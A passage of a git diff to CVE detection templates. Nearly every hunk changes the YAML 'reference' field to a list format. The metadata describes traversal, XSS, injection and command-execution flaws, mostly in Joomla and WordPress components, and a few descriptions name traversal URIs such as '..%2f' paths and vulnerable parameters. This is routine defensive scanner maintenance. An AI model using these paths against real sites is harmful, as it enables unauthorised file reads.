https://www.cvedetails.com/cve/CVE-2008-4764 tags: cve,cve2008,joomla,lfi diff --git a/cves/2008/CVE-2008-6172.yaml b/cves/2008/CVE-2008-6172.yaml index f209594c78..8d57e5e23a 100644 --- a/cves/2008/CVE-2008-6172.yaml +++ b/cves/2008/CVE-2008-6172.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/6817 - https://www.cvedetails.com/cve/CVE-2008-6172 tags: cve,cve2008,joomla,lfi diff --git a/cves/2009/CVE-2009-5114.yaml b/cves/2009/CVE-2009-5114.yaml index 557037e9ed..b286f395e1 100644 --- a/cves/2009/CVE-2009-5114.yaml +++ b/cves/2009/CVE-2009-5114.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/36994 - https://www.cvedetails.com/cve/CVE-2009-5114 tags: cve,cve2009,lfi diff --git a/cves/2010/CVE-2010-0943.yaml b/cves/2010/CVE-2010-0943.yaml index 26277c276e..14b6b3f668 100644 --- a/cves/2010/CVE-2010-0943.yaml +++ b/cves/2010/CVE-2010-0943.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/11090 - https://www.cvedetails.com/cve/CVE-2010-0943 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-0944.yaml b/cves/2010/CVE-2010-0944.yaml index fed06bf566..075c61c086 100644 --- a/cves/2010/CVE-2010-0944.yaml +++ b/cves/2010/CVE-2010-0944.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/11088 - https://www.cvedetails.com/cve/CVE-2010-0944 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1353.yaml b/cves/2010/CVE-2010-1353.yaml index c26e19fdb3..cde20e6951 100644 --- a/cves/2010/CVE-2010-1353.yaml +++ b/cves/2010/CVE-2010-1353.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12068 - https://www.cvedetails.com/cve/CVE-2010-1353 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1474.yaml b/cves/2010/CVE-2010-1474.yaml index 35d77a623f..bad1b8ef59 100644 --- a/cves/2010/CVE-2010-1474.yaml +++ b/cves/2010/CVE-2010-1474.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12182 - https://www.cvedetails.com/cve/CVE-2010-1474 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1495.yaml b/cves/2010/CVE-2010-1495.yaml index ee4f0d6ef6..3d3b10b6bb 100644 --- a/cves/2010/CVE-2010-1495.yaml +++ b/cves/2010/CVE-2010-1495.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12286 - https://www.cvedetails.com/cve/CVE-2010-1495 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml index 082c4dab57..9a766ef802 100644 --- a/cves/2010/CVE-2010-1602.yaml +++ b/cves/2010/CVE-2010-1602.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12283 - https://www.cvedetails.com/cve/CVE-2010-1602 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1657.yaml b/cves/2010/CVE-2010-1657.yaml index 9ca7b026c8..b3bc8509e7 100644 --- a/cves/2010/CVE-2010-1657.yaml +++ b/cves/2010/CVE-2010-1657.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12428 - https://www.cvedetails.com/cve/CVE-2010-1657 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1722.yaml b/cves/2010/CVE-2010-1722.yaml index 50d09c0704..6290c4d973 100644 --- a/cves/2010/CVE-2010-1722.yaml +++ b/cves/2010/CVE-2010-1722.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12177 - https://www.cvedetails.com/cve/CVE-2010-1722 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1875.yaml b/cves/2010/CVE-2010-1875.yaml index 1f3d3ef5cd..4db56ab46e 100644 --- a/cves/2010/CVE-2010-1875.yaml +++ b/cves/2010/CVE-2010-1875.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/11851 - https://www.cvedetails.com/cve/CVE-2010-1875 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1953.yaml b/cves/2010/CVE-2010-1953.yaml index 171fc4a085..106ad37fdc 100644 --- a/cves/2010/CVE-2010-1953.yaml +++ b/cves/2010/CVE-2010-1953.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12288 - https://www.cvedetails.com/cve/CVE-2010-1953 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1955.yaml b/cves/2010/CVE-2010-1955.yaml index 569e73c820..932f7d5fe8 100644 --- a/cves/2010/CVE-2010-1955.yaml +++ b/cves/2010/CVE-2010-1955.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12238 - https://www.cvedetails.com/cve/CVE-2010-1955 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1979.yaml b/cves/2010/CVE-2010-1979.yaml index 21d8522a7b..00cab2ad0f 100644 --- a/cves/2010/CVE-2010-1979.yaml +++ b/cves/2010/CVE-2010-1979.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12088 - https://www.cvedetails.com/cve/CVE-2010-1979 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1983.yaml b/cves/2010/CVE-2010-1983.yaml index c72666cc1b..2c169b3f5c 100644 --- a/cves/2010/CVE-2010-1983.yaml +++ b/cves/2010/CVE-2010-1983.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php - reference: | + reference: - https://www.exploit-db.com/exploits/12055 - https://www.cvedetails.com/cve/CVE-2010-1983 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-2033.yaml b/cves/2010/CVE-2010-2033.yaml index feea7b250f..19eba6d68b 100644 --- a/cves/2010/CVE-2010-2033.yaml +++ b/cves/2010/CVE-2010-2033.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html - https://www.cvedetails.com/cve/CVE-2010-2033 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-2259.yaml b/cves/2010/CVE-2010-2259.yaml index 3114b7d6aa..0d38e58882 100644 --- a/cves/2010/CVE-2010-2259.yaml +++ b/cves/2010/CVE-2010-2259.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/10946 - https://www.cvedetails.com/cve/CVE-2010-2259 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-2682.yaml b/cves/2010/CVE-2010-2682.yaml index 11ae2576a6..180ce24bb8 100644 --- a/cves/2010/CVE-2010-2682.yaml +++ b/cves/2010/CVE-2010-2682.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/14017 - https://www.cvedetails.com/cve/CVE-2010-2682 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-4617.yaml b/cves/2010/CVE-2010-4617.yaml index 39c726a67f..6b8918ae9b 100644 --- a/cves/2010/CVE-2010-4617.yaml +++ b/cves/2010/CVE-2010-4617.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/15791 - https://www.cvedetails.com/cve/CVE-2010-4617 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-5278.yaml b/cves/2010/CVE-2010-5278.yaml index 244c56776c..d0ad27b0a9 100644 --- a/cves/2010/CVE-2010-5278.yaml +++ b/cves/2010/CVE-2010-5278.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/34788 - https://www.cvedetails.com/cve/CVE-2010-5278 tags: cve,cve2010,lfi diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 8b0d597cec..05714d8b90 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 diff --git a/cves/2011/CVE-2011-4804.yaml b/cves/2011/CVE-2011-4804.yaml index b159420f76..f7dc717b28 100644 --- a/cves/2011/CVE-2011-4804.yaml +++ b/cves/2011/CVE-2011-4804.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/36598 - https://www.cvedetails.com/cve/CVE-2011-4804 tags: cve,cve2011,joomla,lfi diff --git a/cves/2012/CVE-2012-0991.yaml b/cves/2012/CVE-2012-0991.yaml index 80b0e2d0a3..338de87d83 100644 --- a/cves/2012/CVE-2012-0991.yaml +++ b/cves/2012/CVE-2012-0991.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. - reference: | + reference: - https://www.exploit-db.com/exploits/36650 - https://www.cvedetails.com/cve/CVE-2012-0991 tags: cve,cve2012,lfi,openemr diff --git a/cves/2012/CVE-2012-4253.yaml b/cves/2012/CVE-2012-4253.yaml index c683b8e11c..7bc7888e98 100644 --- a/cves/2012/CVE-2012-4253.yaml +++ b/cves/2012/CVE-2012-4253.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. - reference: | + reference: - https://www.exploit-db.com/exploits/37129 - https://www.cvedetails.com/cve/CVE-2012-4253 tags: cve,cve2012,lfi diff --git a/cves/2013/CVE-2013-5979.yaml b/cves/2013/CVE-2013-5979.yaml index 83ee111c1f..e3748feb78 100644 --- a/cves/2013/CVE-2013-5979.yaml +++ b/cves/2013/CVE-2013-5979.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/26955 - https://www.cvedetails.com/cve/CVE-2013-5979 - https://bugs.launchpad.net/xibo/+bug/1093967 diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml index 78c28ee6cb..95bd42d005 100644 --- a/cves/2014/CVE-2014-4535.yaml +++ b/cves/2014/CVE-2014-4535.yaml @@ -4,7 +4,7 @@ info: name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: | + reference: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 tags: cve,cve2014,wordpress,wp-plugin,xss diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml index 1d3d5293f3..d1f974d279 100644 --- a/cves/2014/CVE-2014-4536.yaml +++ b/cves/2014/CVE-2014-4536.yaml @@ -4,7 +4,7 @@ info: name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS author: daffainfo severity: medium - reference: | + reference: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 tags: cve,cve2014,wordpress,wp-plugin,xss diff --git a/cves/2014/CVE-2014-5368.yaml b/cves/2014/CVE-2014-5368.yaml index 9b0bd4e453..bf03c5374a 100644 --- a/cves/2014/CVE-2014-5368.yaml +++ b/cves/2014/CVE-2014-5368.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/39287 - https://www.cvedetails.com/cve/CVE-2014-5368 tags: cve,cve2014,wordpress,wp-plugin,lfi diff --git a/cves/2014/CVE-2014-8799.yaml b/cves/2014/CVE-2014-8799.yaml index 2b9c04935c..2fff64b065 100644 --- a/cves/2014/CVE-2014-8799.yaml +++ b/cves/2014/CVE-2014-8799.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. - reference: | + reference: - https://www.exploit-db.com/exploits/35346 - https://www.cvedetails.com/cve/CVE-2014-8799 tags: cve,cve2014,wordpress,wp-plugin,lfi diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml index 087cc89239..ddb93e60fb 100644 --- a/cves/2015/CVE-2015-2807.yaml +++ b/cves/2015/CVE-2015-2807.yaml @@ -4,7 +4,7 @@ info: name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: | + reference: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 tags: cve,cve2015,wordpress,wp-plugin,xss diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml index d0919e1ca5..d5c3fea0f8 100644 --- a/cves/2015/CVE-2015-9414.yaml +++ b/cves/2015/CVE-2015-9414.yaml @@ -4,7 +4,7 @@ info: name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: | + reference: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414 tags: cve,cve2015,wordpress,wp-plugin,xss diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index 27d47c8577..b0abb144a2 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ b/cves/2016/CVE-2016-1000128.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 - reference: | + reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism tags: cve,cve2016,wordpress,xss,wp-plugin diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml index 3053e62231..05a6a6285a 100644 --- a/cves/2016/CVE-2016-1000139.yaml +++ b/cves/2016/CVE-2016-1000139.yaml @@ -4,7 +4,7 @@ info: name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS author: daffainfo severity: medium - reference: | + reference: - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 tags: cve,cve2016,wordpress,wp-plugin,xss diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml index 515c9bcf84..fbb5d33d47 100644 --- a/cves/2016/CVE-2016-1000148.yaml +++ b/cves/2016/CVE-2016-1000148.yaml @@ -4,7 +4,7 @@ info: name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: | + reference: - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 tags: cve,cve2016,wordpress,wp-plugin,xss diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml index 0b2a7df05e..5dcf8191cd 100644 --- a/cves/2016/CVE-2016-10993.yaml +++ b/cves/2016/CVE-2016-10993.yaml @@ -4,7 +4,7 @@ info: name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: | + reference: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 tags: cve,cve2016,wordpress,wp-theme,xss diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml index 52a02ca494..a65ee5deea 100644 --- a/cves/2016/CVE-2016-2389.yaml +++ b/cves/2016/CVE-2016-2389.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978. - reference: | + reference: - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - https://www.cvedetails.com/cve/CVE-2016-2389 tags: cve,cve2016,lfi,sap diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml index 5928f214c0..9388b6bf6c 100644 --- a/cves/2017/CVE-2017-18024.yaml +++ b/cves/2017/CVE-2017-18024.yaml @@ -4,7 +4,7 @@ info: name: AvantFAX 3.3.3 XSS author: pikpikcu severity: medium - reference: | + reference: - https://hackerone.com/reports/963798 - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2017-18024 diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index 2562be9725..c775728787 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. - reference: | + reference: - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 tags: cve,cve2018,lg-nas,rce,oob diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index a14147df11..31ab970f95 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. - reference: | + reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 tags: cve,cve2018,logontracer,rce,oob diff --git a/cves/2018/CVE-2018-16288.yaml b/cves/2018/CVE-2018-16288.yaml index 7f8f868002..8705a4dbee 100644 --- a/cves/2018/CVE-2018-16288.yaml +++ b/cves/2018/CVE-2018-16288.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. - reference: | + reference: - https://www.exploit-db.com/exploits/45440 - https://www.cvedetails.com/cve/CVE-2018-16288 tags: cve,cve2018,lfi diff --git a/cves/2018/CVE-2018-19458.yaml b/cves/2018/CVE-2018-19458.yaml index 19d401e3d7..bd3bb051fe 100644 --- a/cves/2018/CVE-2018-19458.yaml +++ b/cves/2018/CVE-2018-19458.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246. - reference: | + reference: - https://www.exploit-db.com/exploits/45780 - https://www.cvedetails.com/cve/CVE-2018-19458 tags: cve,cve2018,lfi diff --git a/cves/2018/CVE-2018-20470.yaml b/cves/2018/CVE-2018-20470.yaml index f330e0e2f4..980bd20b83 100644 --- a/cves/2018/CVE-2018-20470.yaml +++ b/cves/2018/CVE-2018-20470.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. - reference: | + reference: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - https://www.cvedetails.com/cve/CVE-2018-20470 tags: cve,cve2018,lfi diff --git a/cves/2019/CVE-2019-12276.yaml b/cves/2019/CVE-2019-12276.yaml index 04aad1e2f5..a069b1acf1 100644 --- a/cves/2019/CVE-2019-12276.yaml +++ b/cves/2019/CVE-2019-12276.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40. - reference: | + reference: - https://security401.com/grandnode-path-traversal/ - https://www.cvedetails.com/cve/CVE-2019-12276 tags: cve,cve2019,lfi diff --git a/cves/2019/CVE-2019-16313.yaml b/cves/2019/CVE-2019-16313.yaml index 4acbe787fc..3c5865e1f6 100644 --- a/cves/2019/CVE-2019-16313.yaml +++ b/cves/2019/CVE-2019-16313.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: ifw8 Router ROM v4.31 allows credential disclosure by reading the action/usermanager.htm HTML source code. - reference: | + reference: - https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - https://nvd.nist.gov/vuln/detail/CVE-2019-16313 tags: cve,cve2019,lfi diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index 3a7b34ee93..4f4f37861c 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. - reference: | + reference: - https://plugins.trac.wordpress.org/changeset/2152730 - https://wordpress.org/plugins/api-bearer-auth/#developers tags: cve,cve2019,wordpress,xss,wp-plugin diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml index 8561aa1c8a..bd88faf42d 100644 --- a/cves/2019/CVE-2019-7238.yaml +++ b/cves/2019/CVE-2019-7238.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical tags: cve,cve2019,nexus,rce - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - https://github.com/jas502n/CVE-2019-7238 diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml index bc0a6e0e6d..b857a53bc9 100644 --- a/cves/2020/CVE-2019-9618.yaml +++ b/cves/2020/CVE-2019-9618.yaml @@ -4,7 +4,7 @@ info: name: GraceMedia Media Player 1.0 - Local File Inclusion author: 0x_Akoko severity: critical - reference: | + reference: - https://www.exploit-db.com/exploits/46537 - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index a80fc39305..9688a0fa4b 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11 - reference: | + reference: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 tags: cve,cve2020,sophos,rce,oob diff --git a/cves/2020/CVE-2020-35598.yaml b/cves/2020/CVE-2020-35598.yaml index b4ec328110..fe1febddde 100644 --- a/cves/2020/CVE-2020-35598.yaml +++ b/cves/2020/CVE-2020-35598.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. - reference: | + reference: - https://www.exploit-db.com/exploits/49343 - https://www.cvedetails.com/cve/CVE-2020-35598 tags: cve,cve2020,lfi diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml index be79509f04..4c27c186ac 100644 --- a/cves/2020/CVE-2020-6637.yaml +++ b/cves/2020/CVE-2020-6637.yaml @@ -6,7 +6,7 @@ info: severity: high description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. tags: 